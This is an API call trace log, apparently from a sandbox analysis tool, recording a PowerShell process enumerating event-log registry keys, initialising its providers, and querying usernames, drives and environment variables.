	[0405.590] CoTaskMemFree (pv=0x12b510) 
	[0405.590] CoTaskMemFree (pv=0x0) 
	[0405.590] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.590] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x3, lpName=0x12b510, lpcchName=0x28d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.590] CoTaskMemFree (pv=0x12b510) 
	[0405.590] CoTaskMemFree (pv=0x0) 
	[0405.590] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.590] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x4, lpName=0x12b510, lpcchName=0x28d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.590] CoTaskMemFree (pv=0x12b510) 
	[0405.590] CoTaskMemFree (pv=0x0) 
	[0405.590] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.590] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x5, lpName=0x12b510, lpcchName=0x28d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.590] CoTaskMemFree (pv=0x12b510) 
	[0405.590] CoTaskMemFree (pv=0x0) 
	[0405.590] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.590] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x6, lpName=0x12b510, lpcchName=0x28d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.590] CoTaskMemFree (pv=0x12b510) 
	[0405.590] CoTaskMemFree (pv=0x0) 
	[0405.590] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.590] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x7, lpName=0x12b510, lpcchName=0x28d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.590] CoTaskMemFree (pv=0x12b510) 
	[0405.590] CoTaskMemFree (pv=0x0) 
	[0405.590] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.590] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x8, lpName=0x12b510, lpcchName=0x28d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.591] CoTaskMemFree (pv=0x12b510) 
	[0405.591] CoTaskMemFree (pv=0x0) 
	[0405.591] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x320) returned 0x0
	[0405.591] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x0) returned 0x2
	[0405.591] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x370) returned 0x0
	[0405.591] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x0) returned 0x2
	[0405.591] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x374) returned 0x0
	[0405.591] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x0) returned 0x2
	[0405.591] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x378) returned 0x0
	[0405.591] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x0) returned 0x2
	[0405.591] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x37c) returned 0x0
	[0405.591] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x0) returned 0x2
	[0405.592] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x380) returned 0x0
	[0405.592] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x0) returned 0x2
	[0405.592] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x384) returned 0x0
	[0405.592] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x0) returned 0x2
	[0405.592] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x388) returned 0x0
	[0405.592] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x0) returned 0x2
	[0405.592] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x38c) returned 0x0
	[0405.592] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d678 | out: phkResult=0x28d678*=0x390) returned 0x0
	[0405.592] RegCloseKey (hKey=0x390) returned 0x0
	[0405.592] RegCloseKey (hKey=0x36c) returned 0x0
	[0405.593] RegCloseKey (hKey=0x38c) returned 0x0
	[0405.599] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b860008
	[0406.416] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ef9bd0*="WSMan", lpRawData=0x2ef9940) returned 1
	[0406.418] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0406.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0406.418] CoTaskMemFree (pv=0x147db0) 
	[0406.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.424] CoTaskMemAlloc (cb=0x804) returned 0x1b78cf60
	[0406.424] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cf60, nSize=0x28d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d908) returned 0x1
	[0406.424] CoTaskMemFree (pv=0x1b78cf60) 
	[0406.424] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0406.424] GetUserNameW (in: lpBuffer=0x12b510, pcbBuffer=0x28d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d948) returned 1
	[0406.424] CoTaskMemFree (pv=0x12b510) 
	[0406.425] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eff5b0*="Alias", lpRawData=0x2eff340) returned 1
	[0406.426] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0406.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0406.426] CoTaskMemFree (pv=0x147db0) 
	[0406.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.429] CoTaskMemAlloc (cb=0x804) returned 0x1b78cf60
	[0406.429] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cf60, nSize=0x28d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d908) returned 0x1
	[0406.430] CoTaskMemFree (pv=0x1b78cf60) 
	[0406.430] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0406.430] GetUserNameW (in: lpBuffer=0x12b510, pcbBuffer=0x28d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d948) returned 1
	[0406.430] CoTaskMemFree (pv=0x12b510) 
	[0406.431] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f04ba8*="Environment", lpRawData=0x2f04938) returned 1
	[0406.432] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0406.432] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0406.432] CoTaskMemFree (pv=0x147db0) 
	[0406.433] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0406.433] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0406.433] CoTaskMemFree (pv=0x147db0) 
	[0406.433] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0406.434] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0406.434] CoTaskMemFree (pv=0x147db0) 
	[0406.434] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x28d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0406.435] SetErrorMode (uMode=0x1) returned 0x1
	[0406.435] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x28d6c0 | out: lpFileInformation=0x28d6c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0406.435] SetErrorMode (uMode=0x1) returned 0x1
	[0406.436] GetLogicalDrives () returned 0x4
	[0406.436] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28d220, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0406.437] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0406.437] SetErrorMode (uMode=0x1) returned 0x1
	[0406.437] CoTaskMemAlloc (cb=0x68) returned 0x1b765d30
	[0406.437] CoTaskMemAlloc (cb=0x68) returned 0x1b765cc0
	[0406.437] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b765d30, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x28d690, lpMaximumComponentLength=0x28d68c, lpFileSystemFlags=0x28d688, lpFileSystemNameBuffer=0x1b765cc0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28d690*=0x9c354b42, lpMaximumComponentLength=0x28d68c*=0xff, lpFileSystemFlags=0x28d688*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0406.438] CoTaskMemFree (pv=0x1b765d30) 
	[0406.438] CoTaskMemFree (pv=0x1b765cc0) 
	[0406.438] SetErrorMode (uMode=0x1) returned 0x1
	[0406.438] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0406.438] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0406.439] SetErrorMode (uMode=0x1) returned 0x1
	[0406.439] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28d630 | out: lpFileInformation=0x28d630*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0406.439] SetErrorMode (uMode=0x1) returned 0x1
	[0406.439] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0406.439] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28d280, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0406.439] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0406.440] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0406.440] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0406.441] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0406.441] SetErrorMode (uMode=0x1) returned 0x1
	[0406.441] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28d460 | out: lpFileInformation=0x28d460*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0406.441] SetErrorMode (uMode=0x1) returned 0x1
	[0406.441] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0406.441] SetErrorMode (uMode=0x1) returned 0x1
	[0406.441] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28d460 | out: lpFileInformation=0x28d460*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0406.441] SetErrorMode (uMode=0x1) returned 0x1
	[0406.442] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0406.442] SetErrorMode (uMode=0x1) returned 0x1
	[0406.442] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28d500 | out: lpFileInformation=0x28d500*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0406.442] SetErrorMode (uMode=0x1) returned 0x1
	[0406.442] CoTaskMemAlloc (cb=0x804) returned 0x1b78cf60
	[0406.442] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cf60, nSize=0x28d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d908) returned 0x1
	[0406.443] CoTaskMemFree (pv=0x1b78cf60) 
	[0406.443] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0406.443] GetUserNameW (in: lpBuffer=0x12b510, pcbBuffer=0x28d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d948) returned 1
	[0406.443] CoTaskMemFree (pv=0x12b510) 
	[0406.444] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f0bc98*="FileSystem", lpRawData=0x2f0ba28) returned 1
	[0406.445] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0406.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0406.445] CoTaskMemFree (pv=0x147db0) 
	[0406.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.447] CoTaskMemAlloc (cb=0x804) returned 0x1b78cf60
	[0406.447] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cf60, nSize=0x28d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d908) returned 0x1
	[0406.448] CoTaskMemFree (pv=0x1b78cf60) 
	[0406.448] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0406.448] GetUserNameW (in: lpBuffer=0x12b510, pcbBuffer=0x28d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d948) returned 1
	[0406.448] CoTaskMemFree (pv=0x12b510) 
	[0406.449] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f114d8*="Function", lpRawData=0x2f11268) returned 1
	[0406.452] CoTaskMemAlloc (cb=0x104) returned 0x147db0
	[0406.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0406.452] CoTaskMemFree (pv=0x147db0) 
	[0406.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0407.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0407.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0407.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0407.250] CoTaskMemAlloc (cb=0x804) returned 0x1b78cf60
	[0407.250] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cf60, nSize=0x28d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d908) returned 0x1
	[0407.250] CoTaskMemFree (pv=0x1b78cf60) 
	[0407.250] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0407.250] GetUserNameW (in: lpBuffer=0x12b510, pcbBuffer=0x28d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d948) returned 1
	[0407.250] CoTaskMemFree (pv=0x12b510) 
	[0407.251] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f33d00*="Registry", lpRawData=0x2f33a90) returned 1
	[0407.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0407.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0407.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0407.611] CoTaskMemAlloc (cb=0x804) returned 0x1b78cf60
	[0407.611] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cf60, nSize=0x28d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d908) returned 0x1
	[0407.611] CoTaskMemFree (pv=0x1b78cf60) 
	[0407.611] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0407.611] GetUserNameW (in: lpBuffer=0x12b510, pcbBuffer=0x28d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d948) returned 1
	[0407.611] CoTaskMemFree (pv=0x12b510) 
